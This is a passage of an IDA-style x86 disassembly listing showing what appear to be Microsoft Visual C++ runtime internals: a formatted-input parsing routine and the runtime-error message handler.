loc_409751:				; CODE XREF: sub_409217+532j
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jnz	short loc_409760
		and	[ebp+18Ch+var_198], eax
		jmp	short loc_40976E
; ---------------------------------------------------------------------------

loc_409760:				; CODE XREF: sub_409217+542j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	[ebp+18Ch+var_190], eax

loc_40976E:				; CODE XREF: sub_409217+538j
					; sub_409217+547j
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_4097BB
; ---------------------------------------------------------------------------

loc_409774:				; CODE XREF: sub_409217+5ADj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_4097C6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	cl, byte ptr [ebp+18Ch+var_190]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+eax], cl
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409188
		add	esp, 0Ch
		test	eax, eax
		jz	loc_409E09
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_4097BB:				; CODE XREF: sub_409217+55Bj
		push	eax
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		jnz	short loc_409774

loc_4097C6:				; CODE XREF: sub_409217+4B3j
					; sub_409217+4C3j ...
		dec	[ebp+18Ch+var_188]
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jz	short loc_4097DC
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_4097DC:				; CODE XREF: sub_409217+5B6j
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_409E09
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409D71
		mov	eax, [ebp+18Ch+var_1B0]
		inc	[ebp+18Ch+var_1C8]
		lea	ecx, [ebp+18Ch+var_1F8]
		push	ecx
		push	eax
		push	[ebp+18Ch+var_1C4]
		mov	byte ptr [ebx+eax], 0
		movsx	eax, [ebp+18Ch+var_19A]
		dec	eax
		push	eax
		push	off_423F9C
		call	sub_405543
		pop	ecx
		call	eax
		add	esp, 10h
		jmp	loc_409D71
; ---------------------------------------------------------------------------

loc_40981E:				; CODE XREF: sub_409217+31Bj
		test	ecx, ecx
		jnz	short loc_40982C
		inc	[ebp+18Ch+var_198]
		mov	[ebp+18Ch+var_1B8], 1

loc_40982C:				; CODE XREF: sub_409217+609j
					; sub_409217+723j
		cmp	[ebp+18Ch+var_191], 0
		jle	short loc_409836
		mov	[ebp+18Ch+var_1A2], 1

loc_409836:				; CODE XREF: sub_409217+619j
					; sub_409217+823j
		dec	[ebp+18Ch+var_188]
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		mov	edi, esi
		jz	short loc_40984E
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_40984E:				; CODE XREF: sub_409217+628j
					; sub_409217+8E6j ...
		cmp	[ebp+18Ch+var_1B8], 0
		jz	short loc_409862
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_409B1B

loc_409862:				; CODE XREF: sub_409217+63Bj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+18Ch+var_190], eax
		jz	loc_409B08
		cmp	ebx, 63h
		jz	short loc_4098C7
		cmp	ebx, 73h
		jnz	short loc_409896
		cmp	eax, 9
		jl	short loc_409891
		cmp	eax, 0Dh
		jle	loc_409B08

loc_409891:				; CODE XREF: sub_409217+66Fj
		cmp	eax, 20h
		jnz	short loc_4098C7

loc_409896:				; CODE XREF: sub_409217+66Aj
		cmp	ebx, 7Bh
		jnz	loc_409B08
		movsx	ebx, [ebp+18Ch+var_1A4]
		xor	edx, edx
		mov	ecx, eax
		and	ecx, 7
		inc	edx
		shl	edx, cl
		mov	ecx, eax
		sar	ecx, 3
		movsx	ecx, [ebp+ecx+18Ch+var_24]
		xor	ecx, ebx
		test	edx, ecx
		mov	ebx, [ebp+18Ch+var_1AC]
		jz	loc_409B08

loc_4098C7:				; CODE XREF: sub_409217+665j
					; sub_409217+67Dj
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409B02
		cmp	[ebp+18Ch+var_1A2], 0
		jz	loc_409AF7
		mov	[ebp+18Ch+var_1DC], al
		movzx	eax, al
		push	eax
		call	sub_40CDE6
		test	eax, eax
		pop	ecx
		jz	short loc_4098FA
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	[ebp+18Ch+var_1DB], al

loc_4098FA:				; CODE XREF: sub_409217+6D3j
		lea	eax, [ebp+18Ch+var_1F8]
		push	eax
		mov	eax, [ebp+18Ch+var_1F8]
		mov	[ebp+18Ch+var_1E8], 3Fh
		push	dword ptr [eax+0ACh]
		lea	eax, [ebp+18Ch+var_1DC]
		push	eax
		lea	eax, [ebp+18Ch+var_1E8]
		push	eax
		call	sub_40F76D
		mov	ax, word ptr [ebp+18Ch+var_1E8]
		add	esp, 10h
		mov	[esi], ax
		inc	esi
		inc	esi
		jmp	loc_409AFA
; ---------------------------------------------------------------------------

loc_40992C:				; CODE XREF: sub_409217+30Cj
		mov	eax, ebx
		sub	eax, 70h
		jz	loc_409B53
		sub	eax, 3
		jz	loc_40982C
		dec	eax
		dec	eax
		jz	loc_409B57
		sub	eax, 3
		jz	loc_409571
		sub	eax, 3
		jz	short loc_40997A

loc_409956:				; CODE XREF: sub_409217+32Cj
					; sub_409217+33Fj
		movzx	eax, byte ptr [edi]
		cmp	eax, [ebp+18Ch+var_190]
		jnz	loc_409DE1
		dec	[ebp+18Ch+var_1A1]
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409D71
		mov	eax, [ebp+18Ch+var_1FC]
		mov	[ebp+18Ch+var_1E4], eax
		jmp	loc_409D71
; ---------------------------------------------------------------------------

loc_40997A:				; CODE XREF: sub_409217+73Dj
		cmp	[ebp+18Ch+var_191], 0
		jle	short loc_409984
		mov	[ebp+18Ch+var_1A2], 1

loc_409984:				; CODE XREF: sub_409217+767j
		inc	edi
		cmp	byte ptr [edi],	5Eh
		mov	esi, edi
		jnz	short loc_409993
		lea	esi, [edi+1]
		mov	[ebp+18Ch+var_1A4], 0FFh

loc_409993:				; CODE XREF: sub_409217+773j
		push	20h
		lea	eax, [ebp+18Ch+var_24]
		push	0
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		cmp	byte ptr [esi],	5Dh
		jnz	short loc_4099B7
		mov	dl, 5Dh
		inc	esi
		mov	[ebp+18Ch+var_19], 20h
		jmp	short loc_409A26
; ---------------------------------------------------------------------------

loc_4099B7:				; CODE XREF: sub_409217+792j
		mov	dl, [ebp+18Ch+var_1C9]
		jmp	short loc_409A26
; ---------------------------------------------------------------------------

loc_4099BC:				; CODE XREF: sub_409217+813j
		inc	esi
		cmp	al, 2Dh
		jnz	short loc_409A09
		test	dl, dl
		jz	short loc_409A09
		mov	cl, [esi]
		cmp	cl, 5Dh
		jz	short loc_409A09
		inc	esi
		cmp	dl, cl
		jnb	short loc_4099D5
		mov	al, cl
		jmp	short loc_4099D9
; ---------------------------------------------------------------------------

loc_4099D5:				; CODE XREF: sub_409217+7B8j
		mov	al, dl
		mov	dl, cl

loc_4099D9:				; CODE XREF: sub_409217+7BCj
		cmp	dl, al
		ja	short loc_409A05
		sub	al, dl
		inc	al
		movzx	edi, dl
		movzx	edx, al

loc_4099E7:				; CODE XREF: sub_409217+7E9j
		mov	ecx, edi
		and	ecx, 7
		mov	eax, edi
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+18Ch+var_24]
		or	[eax], bl
		inc	edi
		dec	edx
		jnz	short loc_4099E7
		mov	ebx, [ebp+18Ch+var_1AC]

loc_409A05:				; CODE XREF: sub_409217+7C4j
		xor	dl, dl
		jmp	short loc_409A26
; ---------------------------------------------------------------------------

loc_409A09:				; CODE XREF: sub_409217+7A8j
					; sub_409217+7ACj ...
		movzx	ecx, al
		mov	dl, al
		mov	eax, ecx
		and	ecx, 7
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+18Ch+var_24]
		or	[eax], bl
		mov	ebx, [ebp+18Ch+var_1AC]

loc_409A26:				; CODE XREF: sub_409217+79Ej
					; sub_409217+7A3j ...
		mov	al, [esi]
		cmp	al, 5Dh
		jnz	short loc_4099BC
		test	al, al
		jz	loc_409E09
		mov	[ebp+18Ch+var_1B4], esi
		mov	esi, [ebp+18Ch+var_1C4]
		jmp	loc_409836
; ---------------------------------------------------------------------------

loc_409A3F:				; CODE XREF: sub_409217+360j
		cmp	ebx, 2Bh
		jnz	short loc_409A63

loc_409A44:				; CODE XREF: sub_409217+36Aj
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409A53
		test	ecx, ecx
		jz	short loc_409A53
		mov	[ebp+18Ch+var_189], 1
		jmp	short loc_409A63
; ---------------------------------------------------------------------------

loc_409A53:				; CODE XREF: sub_409217+830j
					; sub_409217+834j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx

loc_409A63:				; CODE XREF: sub_409217+82Bj
					; sub_409217+83Aj
		cmp	ebx, 30h
		jnz	loc_409B89
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	ebx, eax
		cmp	bl, 78h
		mov	[ebp+18Ch+var_190], ebx
		jz	short loc_409AC8
		cmp	bl, 58h
		jz	short loc_409AC8
		cmp	[ebp+18Ch+var_1AC], 78h
		mov	[ebp+18Ch+var_1A8], 1
		jz	short loc_409AAD
		cmp	[ebp+18Ch+var_1B8], 0
		jz	short loc_409AA1
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409AA1
		inc	[ebp+18Ch+var_189]

loc_409AA1:				; CODE XREF: sub_409217+880j
					; sub_409217+885j
		mov	[ebp+18Ch+var_1AC], 6Fh
		jmp	loc_409B89
; ---------------------------------------------------------------------------

loc_409AAD:				; CODE XREF: sub_409217+87Aj
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409AC0
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_409AC0:				; CODE XREF: sub_409217+89Cj
		push	30h
		pop	ebx
		jmp	loc_409B86
; ---------------------------------------------------------------------------

loc_409AC8:				; CODE XREF: sub_409217+868j
					; sub_409217+86Dj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		cmp	[ebp+18Ch+var_1B8], 0
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jz	short loc_409AEB
		sub	[ebp+18Ch+var_198], 2
		cmp	[ebp+18Ch+var_198], 1
		jge	short loc_409AEB
		inc	[ebp+18Ch+var_189]

loc_409AEB:				; CODE XREF: sub_409217+8C5j
					; sub_409217+8CFj
		mov	[ebp+18Ch+var_1AC], 78h
		jmp	loc_409B89
; ---------------------------------------------------------------------------

loc_409AF7:				; CODE XREF: sub_409217+6BEj
		mov	[esi], al
		inc	esi

loc_409AFA:				; CODE XREF: sub_409217+710j
		mov	[ebp+18Ch+var_1C4], esi
		jmp	loc_40984E
; ---------------------------------------------------------------------------

loc_409B02:				; CODE XREF: sub_409217+6B4j
		inc	edi
		jmp	loc_40984E
; ---------------------------------------------------------------------------

loc_409B08:				; CODE XREF: sub_409217+65Cj
					; sub_409217+674j ...
		dec	[ebp+18Ch+var_188]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_409B1B
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_409B1B:				; CODE XREF: sub_409217+645j
					; sub_409217+8F7j
		cmp	edi, esi
		jz	loc_409E09
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409D71
		inc	[ebp+18Ch+var_1C8]
		cmp	ebx, 63h
		jz	loc_409D71
		cmp	[ebp+18Ch+var_1A2], 0
		mov	eax, [ebp+18Ch+var_1C4]
		jz	short loc_409B4B
		and	word ptr [eax],	0
		jmp	loc_409D71
; ---------------------------------------------------------------------------

loc_409B4B:				; CODE XREF: sub_409217+929j
		mov	byte ptr [eax],	0
		jmp	loc_409D71
; ---------------------------------------------------------------------------

loc_409B53:				; CODE XREF: sub_409217+71Aj
		mov	[ebp+18Ch+var_19A], 1

loc_409B57:				; CODE XREF: sub_409217+312j
					; sub_409217+326j ...
		mov	ebx, [ebp+18Ch+var_190]
		cmp	ebx, 2Dh
		jnz	short loc_409B65
		mov	[ebp+18Ch+var_1A3], 1
		jmp	short loc_409B6A
; ---------------------------------------------------------------------------

loc_409B65:				; CODE XREF: sub_409217+946j
		cmp	ebx, 2Bh
		jnz	short loc_409B89

loc_409B6A:				; CODE XREF: sub_409217+94Cj
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409B79
		test	ecx, ecx
		jz	short loc_409B79
		mov	[ebp+18Ch+var_189], 1
		jmp	short loc_409B89
; ---------------------------------------------------------------------------

loc_409B79:				; CODE XREF: sub_409217+956j
					; sub_409217+95Aj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	ebx, eax

loc_409B86:				; CODE XREF: sub_409217+8ACj
		mov	[ebp+18Ch+var_190], ebx

loc_409B89:				; CODE XREF: sub_409217+84Fj
					; sub_409217+891j ...
		cmp	[ebp+18Ch+var_1D4], 0
		jz	loc_409C8E
		cmp	[ebp+18Ch+var_189], 0
		jnz	loc_409C69

loc_409B9D:				; CODE XREF: sub_409217+A3Aj
		cmp	[ebp+18Ch+var_1AC], 78h
		jz	short loc_409BF2
		cmp	[ebp+18Ch+var_1AC], 70h
		jz	short loc_409BF2
		movzx	eax, bl
		push	eax
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		jz	loc_409C56
		cmp	[ebp+18Ch+var_1AC], 6Fh
		jnz	short loc_409BDC
		cmp	ebx, 38h
		jge	loc_409C56
		mov	eax, [ebp+18Ch+var_1BC]
		mov	esi, [ebp+18Ch+var_1C0]
		shld	eax, esi, 3
		shl	esi, 3
		mov	[ebp+18Ch+var_1BC], eax
		jmp	short loc_409C27
; ---------------------------------------------------------------------------

loc_409BDC:				; CODE XREF: sub_409217+9A8j
		push	0
		push	0Ah
		push	[ebp+18Ch+var_1BC]
		push	[ebp+18Ch+var_1C0]
		call	sub_40F8A0
		mov	esi, eax
		mov	[ebp+18Ch+var_1BC], edx
		jmp	short loc_409C27
; ---------------------------------------------------------------------------

loc_409BF2:				; CODE XREF: sub_409217+98Aj
					; sub_409217+990j
		movzx	edi, bl
		push	edi
		call	sub_40F5AC
		test	eax, eax
		pop	ecx
		jz	short loc_409C56
		mov	eax, [ebp+18Ch+var_1BC]
		mov	esi, [ebp+18Ch+var_1C0]
		shld	eax, esi, 4
		push	edi
		shl	esi, 4
		mov	[ebp+18Ch+var_1BC], eax
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		movsx	ebx, bl
		jnz	short loc_409C24
		and	ebx, 0FFFFFFDFh
		sub	ebx, 7

loc_409C24:				; CODE XREF: sub_409217+A05j
		mov	[ebp+18Ch+var_190], ebx

loc_409C27:				; CODE XREF: sub_409217+9C3j
					; sub_409217+9D9j
		inc	[ebp+18Ch+var_1A8]
		lea	eax, [ebx-30h]
		cdq
		add	esi, eax
		adc	[ebp+18Ch+var_1BC], edx
		cmp	[ebp+18Ch+var_1B8], 0
		mov	[ebp+18Ch+var_1C0], esi
		jz	short loc_409C41
		dec	[ebp+18Ch+var_198]
		jz	short loc_409C69

loc_409C41:				; CODE XREF: sub_409217+A23j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jmp	loc_409B9D
; ---------------------------------------------------------------------------

loc_409C56:				; CODE XREF: sub_409217+99Ej
					; sub_409217+9ADj ...
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409C69
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_409C69:				; CODE XREF: sub_409217+980j
					; sub_409217+A28j ...
		cmp	[ebp+18Ch+var_1A3], 0
		mov	edi, [ebp+18Ch+var_1E0]
		jz	loc_409D31
		mov	eax, [ebp+18Ch+var_1C0]
		mov	ecx, [ebp+18Ch+var_1BC]
		neg	eax
		adc	ecx, 0
		neg	ecx
		mov	[ebp+18Ch+var_1C0], eax
		mov	[ebp+18Ch+var_1BC], ecx
		jmp	loc_409D31
; ---------------------------------------------------------------------------

loc_409C8E:				; CODE XREF: sub_409217+976j
		cmp	[ebp+18Ch+var_189], 0
		mov	edi, [ebp+18Ch+var_1E0]
		jnz	loc_409D29

loc_409C9B:				; CODE XREF: sub_409217+AFDj
		cmp	[ebp+18Ch+var_1AC], 78h
		jz	short loc_409CCA
		cmp	[ebp+18Ch+var_1AC], 70h
		jz	short loc_409CCA
		movzx	eax, bl
		push	eax
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		jz	short loc_409D16
		cmp	[ebp+18Ch+var_1AC], 6Fh
		jnz	short loc_409CC5
		cmp	ebx, 38h
		jge	short loc_409D16
		shl	edi, 3
		jmp	short loc_409CF2
; ---------------------------------------------------------------------------

loc_409CC5:				; CODE XREF: sub_409217+AA2j
		imul	edi, 0Ah
		jmp	short loc_409CF2
; ---------------------------------------------------------------------------

loc_409CCA:				; CODE XREF: sub_409217+A88j
					; sub_409217+A8Ej
		movzx	esi, bl
		push	esi
		call	sub_40F5AC
		test	eax, eax
		pop	ecx
		jz	short loc_409D16
		push	esi
		shl	edi, 4
		call	sub_40F52F
		test	eax, eax
		pop	ecx
		movsx	ebx, bl
		jnz	short loc_409CEF
		and	ebx, 0FFFFFFDFh
		sub	ebx, 7

loc_409CEF:				; CODE XREF: sub_409217+AD0j
		mov	[ebp+18Ch+var_190], ebx

loc_409CF2:				; CODE XREF: sub_409217+AACj
					; sub_409217+AB1j
		inc	[ebp+18Ch+var_1A8]
		cmp	[ebp+18Ch+var_1B8], 0
		lea	edi, [edi+ebx-30h]
		jz	short loc_409D04
		dec	[ebp+18Ch+var_198]
		jz	short loc_409D29

loc_409D04:				; CODE XREF: sub_409217+AE6j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jmp	short loc_409C9B
; ---------------------------------------------------------------------------

loc_409D16:				; CODE XREF: sub_409217+A9Cj
					; sub_409217+AA7j ...
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409D29
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_409D29:				; CODE XREF: sub_409217+A7Ej
					; sub_409217+AEBj ...
		cmp	[ebp+18Ch+var_1A3], 0
		jz	short loc_409D31
		neg	edi

loc_409D31:				; CODE XREF: sub_409217+A59j
					; sub_409217+A72j ...
		cmp	[ebp+18Ch+var_1AC], 46h
		jnz	short loc_409D3B
		and	[ebp+18Ch+var_1A8], 0

loc_409D3B:				; CODE XREF: sub_409217+B1Ej
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_409E09
		cmp	[ebp+18Ch+var_199], 0
		jnz	short loc_409D71
		inc	[ebp+18Ch+var_1C8]
		mov	esi, [ebp+18Ch+var_1C4]

loc_409D51:				; CODE XREF: sub_409217+34Cj
		cmp	[ebp+18Ch+var_1D4], 0
		jz	short loc_409D64
		mov	eax, [ebp+18Ch+var_1C0]
		mov	[esi], eax
		mov	eax, [ebp+18Ch+var_1BC]
		mov	[esi+4], eax
		jmp	short loc_409D71
; ---------------------------------------------------------------------------

loc_409D64:				; CODE XREF: sub_409217+B3Ej
		cmp	[ebp+18Ch+var_19A], 0
		jz	short loc_409D6E
		mov	[esi], edi
		jmp	short loc_409D71
; ---------------------------------------------------------------------------

loc_409D6E:				; CODE XREF: sub_409217+B51j
		mov	[esi], di

loc_409D71:				; CODE XREF: sub_409217+352j
					; sub_409217+5D3j ...
		mov	edi, [ebp+18Ch+var_1B4]
		inc	[ebp+18Ch+var_1A1]
		inc	edi
		mov	[ebp+18Ch+var_1B4], edi
		jmp	short loc_409DBF
; ---------------------------------------------------------------------------

loc_409D7D:				; CODE XREF: sub_409217+17Cj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		mov	ebx, eax
		movzx	eax, byte ptr [edi]
		inc	edi
		cmp	eax, ebx
		mov	[ebp+18Ch+var_190], ebx
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_409DF7
		movzx	eax, bl
		push	eax
		call	sub_40CDE6
		test	eax, eax
		pop	ecx
		jz	short loc_409DBF
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4091DC
		movzx	ecx, byte ptr [edi]
		inc	edi
		cmp	ecx, eax
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_409DE7
		dec	[ebp+18Ch+var_188]

loc_409DBF:				; CODE XREF: sub_409217+B64j
					; sub_409217+B8Dj
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jnz	short loc_409DD5
		cmp	byte ptr [edi],	25h
		jnz	short loc_409E09
		mov	eax, [ebp+18Ch+var_1B4]
		cmp	byte ptr [eax+1], 6Eh
		jnz	short loc_409E09
		mov	edi, eax

loc_409DD5:				; CODE XREF: sub_409217+174j
					; sub_409217+BACj
		mov	al, [edi]
		test	al, al
		jnz	loc_40934F
		jmp	short loc_409E09
; ---------------------------------------------------------------------------

loc_409DE1:				; CODE XREF: sub_409217+303j
					; sub_409217+745j
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jmp	short loc_409DFA
; ---------------------------------------------------------------------------

loc_409DE7:				; CODE XREF: sub_409217+BA3j
		cmp	eax, 0FFFFFFFFh
		jz	short loc_409DF7
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_409DF7:				; CODE XREF: sub_409217+B7Fj
					; sub_409217+BD3j
		cmp	ebx, 0FFFFFFFFh

loc_409DFA:				; CODE XREF: sub_409217+BCEj
		jz	short loc_409E09
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F64F
		pop	ecx
		pop	ecx

loc_409E09:				; CODE XREF: sub_409217+2ECj
					; sub_409217+3D7j ...
		cmp	[ebp+18Ch+var_1D0], 1
		jnz	short loc_409E18
		push	[ebp+18Ch+var_1B0]
		call	sub_4039C3
		pop	ecx

loc_409E18:				; CODE XREF: sub_409217+BF6j
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jnz	short loc_409E3C
		mov	eax, [ebp+18Ch+var_1C8]
		test	eax, eax
		jnz	short loc_409E2D
		cmp	[ebp+18Ch+var_1A1], al
		jnz	short loc_409E2D
		or	eax, 0FFFFFFFFh

loc_409E2D:				; CODE XREF: sub_409217+C0Cj
					; sub_409217+C11j
		cmp	[ebp+18Ch+var_1EC], 0
		jz	short loc_409E4C
		mov	ecx, [ebp+18Ch+var_1F0]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_409E4C
; ---------------------------------------------------------------------------

loc_409E3C:				; CODE XREF: sub_409217+12Fj
					; sub_409217+C05j
		cmp	[ebp+18Ch+var_1EC], 0
		jz	short loc_409E49
		mov	eax, [ebp+18Ch+var_1F0]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_409E49:				; CODE XREF: sub_409217+C29j
		mov	eax, [ebp+18Ch+var_1C8]

loc_409E4C:				; CODE XREF: sub_409217+70j
					; sub_409217+C1Aj ...
		mov	ecx, [ebp+18Ch+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 18Ch
		leave
		retn
sub_409217	endp


; =============== S U B	R O U T	I N E =======================================



sub_409E64	proc near		; CODE XREF: sub_403AA0+2Ap
					; sub_40428D+12p ...

var_4		= byte ptr -4
arg_0		= dword	ptr  4

		push	ecx
		push	ebx
		mov	ebx, [esp+8+arg_0]
		push	esi
		push	edi
		xor	esi, esi
		xor	edi, edi

loc_409E70:				; CODE XREF: sub_409E64+19j
		cmp	ebx, dword_423C00[edi*8]
		jz	short loc_409E7F
		inc	edi
		cmp	edi, 17h
		jl	short loc_409E70

loc_409E7F:				; CODE XREF: sub_409E64+13j
		cmp	edi, 17h
		jnb	loc_409FFF
		push	ebp
		push	3
		call	sub_40FA72
		cmp	eax, 1
		pop	ecx
		jz	loc_409FCB
		push	3
		call	sub_40FA72
		test	eax, eax
		pop	ecx
		jnz	short loc_409EB3
		cmp	dword_423050, 1
		jz	loc_409FCB

loc_409EB3:				; CODE XREF: sub_409E64+40j
		cmp	ebx, 0FCh
		jz	loc_409FFE
		push	offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
		mov	ebx, 314h
		push	ebx
		mov	ebp, offset dword_427618
		push	ebp
		call	sub_407A85
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_409EE9
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_409EE9:				; CODE XREF: sub_409E64+76j
		push	104h
		mov	esi, offset byte_427631
		push	esi
		push	0
		mov	byte_427735, 0
		call	ds:dword_41D060	; GetModuleFileNameA
		test	eax, eax
		jnz	short loc_409F2D
		push	offset aProgramNameUnk ; "<program name	unknown>"
		push	2FBh
		push	esi
		call	sub_407A85
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_409F2D
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4031FD
		add	esp, 14h

loc_409F2D:				; CODE XREF: sub_409E64+A1j
					; sub_409E64+B8j
		push	esi
		call	sub_4044E0
		inc	eax
		cmp	eax, 3Ch
		pop	ecx
		jbe	short loc_409F72
		push	esi
		call	sub_4044E0
		sub	esi, 3Bh
		add	eax, esi
		push	3
		mov	ecx, offset dword_42792C
		push	offset a___	; "..."
		sub	ecx, eax
		push	ecx
		push	eax
		call	sub_40CBF6
		add	esp, 14h
		test	eax, eax
		jz	short loc_409F72
		xor	esi, esi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h
		jmp	short loc_409F74
; ---------------------------------------------------------------------------

loc_409F72:				; CODE XREF: sub_409E64+D4j
					; sub_409E64+FBj
		xor	esi, esi

loc_409F74:				; CODE XREF: sub_409E64+10Cj
		push	offset asc_41DB20 ; "\n\n"
		push	ebx
		push	ebp
		call	sub_40CB3D
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_409F94
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_409F94:				; CODE XREF: sub_409E64+121j
		push	off_423C04[edi*8]
		push	ebx
		push	ebp
		call	sub_40CB3D
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_409FB6
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_409FB6:				; CODE XREF: sub_409E64+143j
		push	12010h
		push	offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
		push	ebp
		call	sub_40F8D4
		add	esp, 0Ch
		jmp	short loc_409FFE
; ---------------------------------------------------------------------------

loc_409FCB:				; CODE XREF: sub_409E64+30j
					; sub_409E64+49j
		push	0FFFFFFF4h
		call	ds:dword_41D148	; GetStdHandle
		mov	ebp, eax
		cmp	ebp, esi
		jz	short loc_409FFE
		cmp	ebp, 0FFFFFFFFh
		jz	short loc_409FFE
		push	0
		lea	eax, [esp+18h+var_4]
		push	eax
		lea	esi, ds:423C04h[edi*8]
		push	dword ptr [esi]
		call	sub_4044E0
		pop	ecx
		push	eax
		push	dword ptr [esi]
		push	ebp
		call	ds:dword_41D088	; WriteFile

loc_409FFE:				; CODE XREF: sub_409E64+55j
					; sub_409E64+165j ...
		pop	ebp

loc_409FFF:				; CODE XREF: sub_409E64+1Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ecx
		retn
sub_409E64	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A004	proc near		; CODE XREF: sub_403AA0+23p
					; sub_40428D+9p ...
		push	3
		call	sub_40FA72
		cmp	eax, 1
		pop	ecx
		jz	short loc_40A026
		push	3
		call	sub_40FA72
		test	eax, eax
		pop	ecx
		jnz	short locret_40A03C
		cmp	dword_423050, 1
		jnz	short locret_40A03C

loc_40A026:				; CODE XREF: sub_40A004+Bj
		push	0FCh
		call	sub_409E64
		push	0FFh
		call	sub_409E64
		pop	ecx
		pop	ecx

locret_40A03C:				; CODE XREF: sub_40A004+17j
					; sub_40A004+20j
		retn
sub_40A004	endp


; =============== S U B	R O U T	I N E =======================================



